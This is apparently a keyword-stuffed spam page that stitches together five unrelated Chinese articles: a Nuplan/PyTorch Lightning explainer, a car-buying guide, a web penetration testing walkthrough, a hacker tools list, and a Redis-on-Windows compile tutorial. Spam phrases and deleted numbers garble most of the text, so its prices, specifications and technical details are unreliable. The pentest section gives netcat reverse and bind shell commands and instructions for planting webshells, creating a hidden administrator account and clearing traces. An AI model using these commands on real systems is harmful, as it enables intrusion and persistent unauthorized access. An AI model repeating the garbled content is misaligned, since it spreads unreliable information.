1.Nuplan源码中Pytorch Lightning详解
2.节后买车指南:这几款轿车颜值高又智能,码包最低才8万元出头
3.web渗透是码包什么?
4.黑客工具软件大全100套
5.编译实战 | 手摸手教你在Windows环境下运行Redis6.x
Nuplan源码中Pytorch Lightning详解
Nuplan源码解读系列中,我们已对Hydra进行了详尽解析。码包Pytorch Lightning,码包针对大型工程设计,码包模块独立,码包聚合支付 源码 java提供模板,码包简化开发。码包其应用主要分为四部分:数据加载、码包模型构建、码包模型使用、码包回调函数。码包在Nuplan中,码包数据加载与模型训练通过run_training.py执行,码包模型评估与可视化则在run_simulation.py和run_nuborad.py中进行。码包Pytorch Lightning提供了简洁实例教程,帮助快速上手。
数据加载方面,Nuplan数据集通过自定义Dataset继承torch.utils.data.Dataset进行加载。数据预处理在compute_features函数中执行,提取map和agent的特征与目标信息。Trainer.fit()启动训练,每个batchsize自动调用getitem函数,执行数据提取。
在数据管理上,LightningDataModule用于数据集划分,Nuplan使用setup、teardown、train_dataloader、val_dataloader、test_dataloader等函数。setup函数调用create_dataset划分数据集,随机选取样本作为训练集。
模型准备阶段,通过LightningModule加载模型,关键方法包括training_step、validation_step、test_step与configure_optimizers。这些函数用于不同阶段的训练、验证、测试与设置优化器。详细流程包括数据准备、自动调用训练函数,以及在training_step中执行整个训练流程,包含特征与目标提取、前向传播、损失计算与指标评估。
后续,我们计划继续探讨Pytorch Lightning的高级应用,以及在Nuplan项目中如何高效集成与优化。请注意,这里提供的代码示例基于在Pytorch Lightning框架上开发的plantf,而非Nuplan的腾讯10分源码原始代码,但主体框架与之相似,仅在模型内容上有所差异。期待进一步的分享与交流。
节后买车指南:这几款轿车颜值高又智能,最低才8万元出头
对于国人来说,虽然很多人对SUV钟爱有加,但是轿车低重心、低油耗以及灵动实用等特点,仍吸引了不少消费者。近几年,在燃油价格不断上涨与新能源化趋势下,一些品牌车企推出了不少纯电、混动轿车,让轿车种类更加丰富,极大地提升了国内轿车市场的繁荣。在这里《车壹圈》就为大家推荐几款今年上市的新款轿车,看看是否有你喜欢的车型。
银河L6:性价比超高的混动轿车
在银河L6上市之前,大家对中高端新能源轿车的概念还停留在价格太贵了。而随吉利银河L6上市,给人们带来一大感受就是超值。
事实上也是如此,银河L6共推出5款车型,官方售价区间为.万-.万元,对于打算入手新能源轿车的朋友来说,这个价格真正做到了“油电同价”,很值得入手。
不仅售价亲民,作为吉利旗下定位中高端新能源车型的银河L6,从内到外都透露着一种高档感。
外观上,银河L6高端大气。前脸采用封闭式格栅设计,前大灯采用时下流行的贯穿式风格,机舱盖上的隆起线条,极大整车运动感。而车身侧面造型流畅、简洁,隐藏式门把手、溜背式造型更加贴近“轿跑”车型风格。
内饰方面,银河L6采用大量的软包包覆和钢琴烤漆喷面材质,进一步提升车内高档感,.英寸液晶仪表,拉升车内科技感。同时,//mm车身尺寸加上mm轴距,带来更加宽敞舒适的驾乘体验。
动力也是银河L6一大优势,相较于同级车普遍搭载1.5L自吸发动机和单挡变速器,银河L6全系标配1.5TD雷神电混发动机,搭配上3挡变频电驱DHT Pro,伪装系统进程源码提供纯电、增程、智能、性能四种驾驶模式。在新一代雷神电混的赋能下,WLTC综合续航里程km,百公里亏电油耗4.L。
智能配置上,银河L6搭载旗舰级座舱芯片+吉利银河专属原生智能座舱系统银河N OS,UI设计和操作都与手机相同,方便用户直接操作——在这个价格区间里,更加彰显银河L6超值与实用。
全新雅阁:亲民版“电动化旗舰”
随着新能源化趋势的加速以及自主高端新能源品牌的崛起,无疑对合资品牌提出了更高要求。不过缓过神来的合资品牌一旦发力,其势头也不可小觑。今年,随着全新雅阁的上市,在高端新能源市场又多了一个强劲的对手。
广汽本田推出全新雅阁,两大动力类型、七个版本。其中,e:PHEV强电智混车型市场指导价为.万元-.万元,锐•T动车型市场指导价为.万元-.万元。
面对来势汹汹的智能化时代,全新雅阁在对内饰进行升级的同时,也增加了不少智能科技配置,搭载7英寸TFT液晶仪表盘和.2英寸中控台的组合,搭载Honda CONNECT 4.0智导互联系统,满足不同用户的个性化需求。
动力方面,新车搭载第四代i-MMD双电机混动系统,能够根据驾驶状态提供纯电、混合和发动机直驱三种模式。其中,全新雅阁(ALL NEW ACCORD)e:PHEV既能长时间纯电驱动又能混合驱动,彻底解决新能源时代用户出行痛点。
智能安全方面,也是全新雅阁一大亮点。新车配备Honda SENSING 安全超感系统,采用毫米波雷达和前置摄像头组成的FCTW穿行先知系统、LCCM变道后卫系统等最新技术成果——这些智能驾驶辅助系统的引入,对预判是否有障碍物或者行人等风险,提升了必要的智能安全保障。对于一代经典车型来说,与时俱进地提升,才会让它的生命力不断得到延续。
全新一代君越:越级科技座驾
看完两款新能源轿车后,我们再了解一下今年推出的燃油车,其中比较关注的是全新一代君越。
今年5月份,茶道开发源码全新一代君越正式上市,新车推出T越行版、T越享版、T越尊版和艾维亚版共四款车型,售价.万元-.万元。
外观上,全新一代君越承袭别克PURE Design纯粹设计理念,整体感觉非常时尚年轻,相比上一代车型有了很大改观。车头采用全新的家族飞檐展翼式前脸,星芒进气格栅,配合新的三色盾徽标;饱满富有张力的侧身配合mm超长轴距,让豪华车的气场得到大幅度提升。
动力方面,全新一代君越依然保存着高效可靠的动力输出。在1.5升涡轮增压发动机,提供充沛动力的同时,还提供2.0升涡轮增压发动机作为选装配置,极大地满足了人们对动力的需求。
其中,T车型和艾维亚版均搭载由第八代Ecotec 2.0T可变缸涡轮增压发动机、V轻混动系统及9速HYDRA-MATIC智能变速箱组成的全新一代智能驱动系统,可输出最大功率kW和Nm峰值扭矩,WLTC综合工况百公里油耗最低仅6.L。
当然,全新一代君越最大的变化还是智能科技方面。首先,车内以游艇式悬浮中控台为中心,营造出科技感极强的驾乘空间,为消费者带来耳目一新的触动。
其次,搭载新一代VCS智能座舱,配备EYEMAX 吋弧面6K屏及高通骁龙芯片,连同支持整车FOTA升级的VIP智能电子架构、5G通信技术,带来沉浸式感官享受和流畅的交互操作体验。
值得一提的是,艾维亚车型还搭载AirCare智能数显净舱系统,可有效过滤、吸附外界空气中的灰尘以及花粉类颗粒物,对0.3μm以上颗粒物过滤效率可达%以上,全面呵护用户的健康出行。
长安逸达:高配置家轿首选
如果要在万元左右家轿中选一款适用车型,那么长安逸达无疑首当其冲成为首选。今年3月份上市的长安逸达1.5T GDI自动尊贵型 8.万元、1.5T GDI自动领航型9.万元、1.5T GDI自动旗舰型. 万元。不到万元就能拥有一辆高品质、高颜值、高配置的家轿,难道你不动心吗?
先看外观,逸达采用源代码点阵式格栅轮廓、超市结账系统源码数字光标LED前大灯、同级独有的隐藏式门把手、顶置式鲨鱼鳍LED制动灯、独创的集成式尾标开关、极具运动感的扰流尾翼设计,在为整车营造时尚运动气息的同时,也拉升了整车高档感。
内饰方面,逸达全系标配.2 英寸高清中控屏、同级更大可开启式星野全景天窗等越级配置。作为一款定位于紧凑级轿车,长安逸达车身尺寸**mm,轴距mm,在营造舒适空间的同时,更带来丰富的科技体验。
此外,细长的.英寸多功能仪表屏幕位于驾驶席前方,使驾驶员不必将视线过多的下移去看信息;中央大屏幕采用竖屏形式,超大的屏幕尺寸为.2英寸进一步提升车内科技感。
动力方面,该车搭载蓝鲸新一代1.5升涡轮增压直喷发动机,最大功率为kW、最大扭矩为N·m,匹配是7速湿式双离合变速器,WLTC综合工况下,百公里油耗仅5.升。
此外,长安逸达还搭载全车6安全气囊、搭载DMS、IMS、IACC集成式自适应巡航,°高清全景影像,°集成式高清行车记录仪等等不足万元的起步价,还拥有如此丰富的科技配置,你们说选择长安逸达超值不超值?
在《车壹圈》看来:理性的消费者选择自己心仪的车型,永远相信“只买对的,不买贵的”这句至理名言。事实上,随着今年“价格战”如火如荼,即使合资品牌新推出的轿车在定价方面,也显示出少有的亲民态度,那么自主轿车在这方面就更加显得超值了。
以上推荐的四款车既有新能源轿车也有燃油轿车,从高端、到中高端再到常规车型一应俱全,产品优势也是各有千秋点。如果你是消费者,年底买车时该会做出怎样的选择呢?
本文来自易车号作者车壹圈,版权归作者所有,任何形式转载请联系作者。内容仅代表作者观点,与易车无关
web渗透是什么?
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
JSP:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端口爆破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用方法:
反向连接
在公网主机上进行监听:
nc-lvp
在内网主机上执行:
nc-e cmd.exe 公网主机ip
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端口爆破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
黑客工具软件大全套
一、网络探测与安全扫描
1. Nessus
作为一款漏洞扫描软件,Nessus拥有超过个插件,能够为远程和本地系统提供全面的安全检测。其GTK界面和自定义插件功能使得操作更加便捷。尽管Nessus 3的免费版本源代码被封禁,购买新插件成为了其一大亮点。
2. Wireshark
作为开源的网络协议分析器,Wireshark能够实时捕获网络数据,支持多种协议和媒体类型。其显示过滤器语言和命令行版本同样强大,但需注意定期进行安全更新。
3. Snort
Snort是一款开源的入侵检测系统,擅长于协议分析和检测可疑行为。其基础的BASE引擎分析简单易用。
4. Netcat
Netcat是一个灵活的网络工具,不仅能进行TCP/UDP数据的读写,还能扩展为多功能调试工具,如Socat和Ncat。
二、密码破解与恢复
5. Cain & Abel
Cain & Abel是一款针对Windows系统的密码嗅探器,其密码破解功能强大,相关文档也非常详尽。
6. John the Ripper
John the Ripper是一款跨平台的密码破解工具,支持多种加密类型,能够有效保护你的密码安全。
三、网络安全防护与防护工具
7. Ettercap
Ettercap是一款交换式局域网的嗅探专家,能够进行实时过滤,保护网络安全。
8. Nikto
Nikto是一款全面的网页扫描器,能够揭示隐藏的漏洞隐患。
四、基础通信工具与远程访问
9. OpenSSH与PuTTY
OpenSSH与PuTTY分别为远程服务器访问提供安全通道。SSH以其易用性和广泛支持而著称,而PuTTY在Windows系统上尤为流行。
. ThC Hydra
ThC Hydra是一款快速的网络认证破解工具,展现其强大的攻击力量。
. Paros proxy
Paros proxy是一款网页漏洞评估代理,支持SQL注入等高级攻击,帮助你洞悉网络风险。
五、网络深入探索与管理
. Netfilter
Netfilter是Linux内核的网络数据包过滤器,拥有丰富的第三方扩展,如FTP功能的增强。
. Sysinternals的工具集
Sysinternals提供的工具集,如ProcessExplorer和PsTools,为Windows系统管理提供实用解决方案。
. Retina
Retina是一款由eEye开发的商业漏洞扫描器,与Nessus齐名,能够提供深入的系统安全评估。
. 脚本语言
通过Perl、Python和Ruby等脚本语言,如Net::RawIP,能够解决特定的网络安全挑战。
六、经典与专业工具
. 基础命令
从基础命令如ping、telnet到高级工具如L0phtcrack(需注册码),这些工具构成了网络安全的完整链条。
. 网络安全管理
如GnuPG/PGP等开源PGP应用,以及专业的Core Impact等工具,都在各自领域发挥着关键作用。
网络安全是一个持续学习和更新的领域,确保你总是掌握最新、最有效的工具箱。
编译实战 | 手摸手教你在Windows环境下运行Redis6.x
哈喽大家好啊,我是没事就愿意瞎捣鼓的Hydra。
不知道有没有小伙伴像我一样,平常开发中用的是windows操作系统,有时候想装点什么软件,一看只支持linux系统,无奈要么启动虚拟机、要么装在云服务器上。
这不前几天又是这样,刚想用一下Redis 6.x版本来尝试一下新特性,打开官网一看,好家伙我直呼内行,果然不支持windows系统:
不过虽然redis的官网上不提供windows版本下载,但是这也难不倒我这个面向百度编程的小能手,一番查找后让我找到了微软在github上维护的几个可以在windows上运行的redis版本:
项目的git地址是/MicrosoftArchive/redis/releases,我翻了一下,微软维护了2.x和3.x的多个windows版本redis,不过比较遗憾,在维护到3.0.正式版本后就放弃了更新。
不过问题不大,眼看微软撂挑子不干了,波兰的热心市民 Tomasz Poradowski 先生这时候站出来,继续开始提供可以在windows上运行的4.x和5.x版本的redis,并且从年到年一干就是5年。
项目git地址是/tporadowski/redis/releases,没错,其实我本地环境运行的redis-5.0.9就是以前从这里下载的,而且绿色版使用起来真的是干净又卫生,所以我强烈建议大家给这位老哥来一个Star支持一下。
不过绕了这么一大圈,我的问题还是没有解决啊,既然没有现成的可以在windows上运行的redis6.x版本,那我们干脆就来自己编译一个吧。
首先介绍一下我们今天要用到的工具Cygwin,先简单看一下它的官网 /,上面很清晰的解释了几个容易引起大家混淆的问题:
先解释了cygwin是什么:
再纠正了大家的常见误区:
其实可以用一句话来概括一下它的功能,cygwin是一个可运行于原生windows系统上的POSIX兼容环境,可以通过重新编译将linux应用移植到windows中。
好了,这样简单了解一下cygwin的功能对我们来说暂时就足够了,下面我们看看如何使用它来编译windows版本redis。
下面我们先进行编译工具Cygwin的下载和安装,在它的官网上就可以直接下载,完成后就可以开始安装了。下面我会贴出一些需要特殊配置的步骤,如果没有特殊说明的话,那么直接痛快的点击下一步就可以了。
网络连接配置这里选择第二项,也就是直接连接,不需要任何代理方式:
在选择下载源这一步,先手动输入User URL,添加阿里云的镜像/cygwin,点击add后再选择我们刚才添加的这个源,然后点击下一步:
接下来选择需要下载安装的组件包,我们只需要下载我们编译相关的模块即可。先通过上面的搜索框进行定位,选择安装Devel模块下面的make、gcc-core,gcc-g++,以及Libs模块下的libgcc1 、libgccpp1,然后点击New这一列的Skip,选择要安装的版本号,全部添加完成后点击下一步:
接下来会自动进行下载上面选择的模块,等待全部下载结束后安装就完成了:
安装完成后,我们运行Cygwin Terminal,通过命令检测可以看到Status为OK,表示cygwin运行正常:
准备好编译工具后,我们接下来先下载redis6.x版本的源码,6.0.的下载地址为:
download.redis.io/relea...
cygwin安装完成后,会在它的安装路径的home目录下,创建一个以你登录系统的用户名来命名的目录,我们把下载完成后的压缩包放到这个cygwin\home\${ user}目录下,在cygwin命令行中先执行解压命令:
使用下面的命令先切换到解压后的根目录,然后执行编译和安装:
点击回车,然后就开始漫长的等待吧,不得不说编译和安装的过程真的很慢,我这大概花了分钟才全部完成。
不出意外的最后果然出现了意外,报了两个Error,不过貌似没有什么太大影响,切换到src目录下,就已经可以看到编译完成后已经生成了6个exe可执行文件了:
但是如果这个时候双击redis-server.exe尝试进行启动的话,那么就会报错提示缺少dll动态链接库:
我们可以在cygwin的bin目录下找到这个文件,为了方便,把可执行文件、动态链接库文件、redis配置文件拷贝到一个单独的目录下再次尝试启动:
这次能够正常启动成功,我们再使用客户端连接工具连接并进行测试,终于,6.0.版本的redis可以在windows环境下正常运行了。
忙活一大顿总算成功了,我们也终于可以在windows上体验redis6.x版本了,不过这里还是给小伙伴们提个醒,这样编译的redis我们平常自己在学习中体验一下就可以了,尽量不要用在生产上。
因为cygwin编译后的程序,相当于在windows系统上模拟实现了POSIX兼容层,应用程序在底层多了一层函数调用,因此效率比运行在linux系统的原生应用低了很多。因此,这样在windows上运行的redis,无疑会损失掉它引以为傲的高性能这一优势。
秉持着好东西就要分享的原则,我也已经把编译好的windows版redis6.0.上传到了网盘,有需要的小伙伴们可以从下面获取下载方式。
那么,这次的分享就到这里,我是Hydra,下期见。
作者简介,码农参上,一个热爱分享的公众号,有趣、深入、直接,与你聊聊技术。个人微信DrHydra9,欢迎添加好友,进一步交流。